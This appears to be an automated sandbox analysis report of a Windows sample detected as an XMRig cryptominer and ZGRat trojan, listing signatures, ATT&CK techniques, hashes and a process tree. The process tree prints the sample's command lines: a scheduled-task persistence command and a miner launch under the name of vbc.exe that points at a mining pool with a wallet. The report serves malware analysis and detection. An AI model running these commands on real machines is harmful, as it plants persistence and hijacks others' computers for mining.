xmrig | 0ec4dc59bfa704ff0777038d4c747fb42db308bed43f2ad6a681b645d1bfecbd

Analysis

max time kernel
227s
max time network
333s
platform
windows11-21h2_x64
resource
win11-20231215-en
resource tags

arch:x64arch:x86image:win11-20231215-enlocale:en-usos:windows11-21h2-x64system
submitted
26-01-2024 19:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6TS3GUANXW9E1KF8.exe
Size

5.6MB
MD5

1a27bd843a09f923661a15300e02d703
SHA1

5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6
SHA256

8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1
SHA512

330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05
SSDEEP

49152:q6orqtRW0jfH4+8MjRJHiEpxxH4vNpQXGp8mih7NUfXUu4tEqNrqcqapPeDkwVzO:foWjZG/Mul2rq/aReDkizMeQU4T

Score

10^/10

xmrig zgrat miner rat upx

Malware Config

Signatures

Detect ZGRat V1 2 IoCs

Processes:

resource	yara_rule
behavioral6/memory/3828-0-0x0000000000290000-0x0000000000830000-memory.dmp	family_zgrat_v1
behavioral6/files/0x000200000002a7cd-12.dat	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 22 IoCs

miner

Processes:

resource	yara_rule
behavioral6/memory/5772-23-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/5772-24-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/5772-26-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/5772-27-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/5772-28-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/5772-29-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/5772-30-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/5772-31-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/5772-32-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/5772-34-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/5772-35-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/5772-36-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/5772-37-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/5772-40-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/2364-57-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/2364-58-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/2364-59-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/2364-60-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/2364-61-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/2364-62-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/2364-63-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral6/memory/2364-64-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral6/memory/3828-0-0x0000000000290000-0x0000000000830000-memory.dmp	net_reactor
behavioral6/files/0x000200000002a7cd-12.dat	net_reactor

Executes dropped EXE 2 IoCs

Processes:

.exe.exe

pid	Process
3936	.exe
3116	.exe

UPX packed file 26 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral6/memory/5772-18-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/5772-20-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/5772-21-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/5772-23-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/5772-24-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/5772-26-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/5772-27-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/5772-28-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/5772-29-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/5772-30-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/5772-31-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/5772-32-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/5772-34-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/5772-35-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/5772-36-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/5772-37-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/5772-40-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/2364-53-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/2364-57-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/2364-58-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/2364-59-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/2364-60-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/2364-61-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/2364-62-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/2364-63-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral6/memory/2364-64-0x0000000140000000-0x00000001407DC000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 2 IoCs

Processes:

.exe.exe

description	pid	Process	procid_target
PID 3936 set thread context of 5772	3936	.exe	87
PID 3116 set thread context of 2364	3116	.exe	93

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exe

pid	Process
3952	schtasks.exe
4936	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

Processes:

timeout.exe

pid	Process
2392	timeout.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

.exe.exe

pid	Process
3936	.exe
3116	.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid	Process
652
652

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

6TS3GUANXW9E1KF8.exe.exevbc.exe.exevbc.exe

description	pid	Process
Token: SeDebugPrivilege	3828	6TS3GUANXW9E1KF8.exe
Token: SeDebugPrivilege	3936	.exe
Token: SeLockMemoryPrivilege	5772	vbc.exe
Token: SeLockMemoryPrivilege	5772	vbc.exe
Token: SeDebugPrivilege	3116	.exe
Token: SeLockMemoryPrivilege	2364	vbc.exe
Token: SeLockMemoryPrivilege	2364	vbc.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

vbc.exevbc.exe

pid	Process
5772	vbc.exe
2364	vbc.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

6TS3GUANXW9E1KF8.execmd.exe.execmd.exe.execmd.exe

description	pid	Process	procid_target
PID 3828 wrote to memory of 1740	3828	6TS3GUANXW9E1KF8.exe	79
PID 3828 wrote to memory of 1740	3828	6TS3GUANXW9E1KF8.exe	79
PID 1740 wrote to memory of 2392	1740	cmd.exe	81
PID 1740 wrote to memory of 2392	1740	cmd.exe	81
PID 1740 wrote to memory of 3936	1740	cmd.exe	82
PID 1740 wrote to memory of 3936	1740	cmd.exe	82
PID 3936 wrote to memory of 2292	3936	.exe	83
PID 3936 wrote to memory of 2292	3936	.exe	83
PID 2292 wrote to memory of 3952	2292	cmd.exe	85
PID 2292 wrote to memory of 3952	2292	cmd.exe	85
PID 3936 wrote to memory of 5772	3936	.exe	87
PID 3936 wrote to memory of 5772	3936	.exe	87
PID 3936 wrote to memory of 5772	3936	.exe	87
PID 3936 wrote to memory of 5772	3936	.exe	87
PID 3936 wrote to memory of 5772	3936	.exe	87
PID 3936 wrote to memory of 5772	3936	.exe	87
PID 3936 wrote to memory of 5772	3936	.exe	87
PID 3116 wrote to memory of 4700	3116	.exe	89
PID 3116 wrote to memory of 4700	3116	.exe	89
PID 4700 wrote to memory of 4936	4700	cmd.exe	92
PID 4700 wrote to memory of 4936	4700	cmd.exe	92
PID 3116 wrote to memory of 2364	3116	.exe	93
PID 3116 wrote to memory of 2364	3116	.exe	93
PID 3116 wrote to memory of 2364	3116	.exe	93
PID 3116 wrote to memory of 2364	3116	.exe	93
PID 3116 wrote to memory of 2364	3116	.exe	93
PID 3116 wrote to memory of 2364	3116	.exe	93
PID 3116 wrote to memory of 2364	3116	.exe	93

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\6TS3GUANXW9E1KF8.exe
"C:\Users\Admin\AppData\Local\Temp\6TS3GUANXW9E1KF8.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD8EB.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1740
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:2392
- - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
    "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3936
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2292
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:3952
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:5772

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3116
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4700
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4936
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2364

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
5.6MB

MD5
1a27bd843a09f923661a15300e02d703

SHA1
5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6

SHA256
8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1

SHA512
330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\.exe.log

Filesize
1KB

MD5
bfc047647012a7b8e2b26e9a4369e1c5

SHA1
2dbf50cfcff0e1ca3312316dd7066fc623834eb0

SHA256
29d02afb829467cbd7db970ff3e1471b688384b0c50ad147100d5ed950e68435

SHA512
c55e6a071fc4f61df81f59ac24258413a1bc6a26d18271be57ae2fb8809b9584d0d0d0dccde0a5b6ec0859110dee6db3ec70117d7814946c7b578b649cec4221

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpD8EB.tmp.bat

Filesize
168B

MD5
db43602afe3b13bc395785d971559d87

SHA1
e5712bb990f9f2c679c8fce0ec15998cf19bea2d

SHA256
6013abf92230f1e9b86e740404acab2d1c02c3b446ede8fd651c5048fdcd1f18

SHA512
0fc41ff7562406341633d322bba98ece124f98139ed2347c6434c95ead09d3990cb44ff3fc23a39d0885e6f61509f7a4c277f95fec2bdd6907d7c493ba48ddee

Download Submit
memory/2364-64-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2364-53-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2364-57-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2364-58-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2364-59-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2364-60-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2364-61-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2364-62-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2364-63-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/3116-56-0x00007FFB99E90000-0x00007FFB9A952000-memory.dmp

Filesize
10.8MB

Download
memory/3116-49-0x000000001CF20000-0x000000001CF30000-memory.dmp

Filesize
64KB

Download
memory/3116-45-0x00007FFB99E90000-0x00007FFB9A952000-memory.dmp

Filesize
10.8MB

Download
memory/3116-46-0x000000001CF20000-0x000000001CF30000-memory.dmp

Filesize
64KB

Download
memory/3116-47-0x0000000001D80000-0x0000000001D81000-memory.dmp

Filesize
4KB

Download
memory/3116-48-0x00007FFB99E90000-0x00007FFB9A952000-memory.dmp

Filesize
10.8MB

Download
memory/3828-1-0x00007FFB99CC0000-0x00007FFB9A782000-memory.dmp

Filesize
10.8MB

Download
memory/3828-9-0x00007FFB99CC0000-0x00007FFB9A782000-memory.dmp

Filesize
10.8MB

Download
memory/3828-3-0x0000000001140000-0x0000000001141000-memory.dmp

Filesize
4KB

Download
memory/3828-2-0x000000001C460000-0x000000001C470000-memory.dmp

Filesize
64KB

Download
memory/3828-0-0x0000000000290000-0x0000000000830000-memory.dmp

Filesize
5.6MB

Download
memory/3936-22-0x00007FFB99B00000-0x00007FFB9A5C2000-memory.dmp

Filesize
10.8MB

Download
memory/3936-14-0x00007FFB99B00000-0x00007FFB9A5C2000-memory.dmp

Filesize
10.8MB

Download
memory/3936-15-0x0000000003110000-0x0000000003120000-memory.dmp

Filesize
64KB

Download
memory/3936-16-0x0000000001800000-0x0000000001801000-memory.dmp

Filesize
4KB

Download
memory/3936-17-0x00007FFB99B00000-0x00007FFB9A5C2000-memory.dmp

Filesize
10.8MB

Download
memory/5772-18-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/5772-37-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/5772-38-0x000002A391390000-0x000002A3913B0000-memory.dmp

Filesize
128KB

Download
memory/5772-39-0x000002A391370000-0x000002A391390000-memory.dmp

Filesize
128KB

Download
memory/5772-40-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/5772-41-0x000002A391390000-0x000002A3913B0000-memory.dmp

Filesize
128KB

Download
memory/5772-42-0x000002A391370000-0x000002A391390000-memory.dmp

Filesize
128KB

Download
memory/5772-36-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/5772-35-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/5772-34-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/5772-32-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/5772-33-0x000002A391330000-0x000002A391370000-memory.dmp

Filesize
256KB

Download
memory/5772-31-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/5772-30-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/5772-29-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/5772-28-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/5772-27-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/5772-26-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/5772-25-0x000002A38FAE0000-0x000002A38FB00000-memory.dmp

Filesize
128KB

Download
memory/5772-24-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/5772-23-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/5772-21-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/5772-20-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download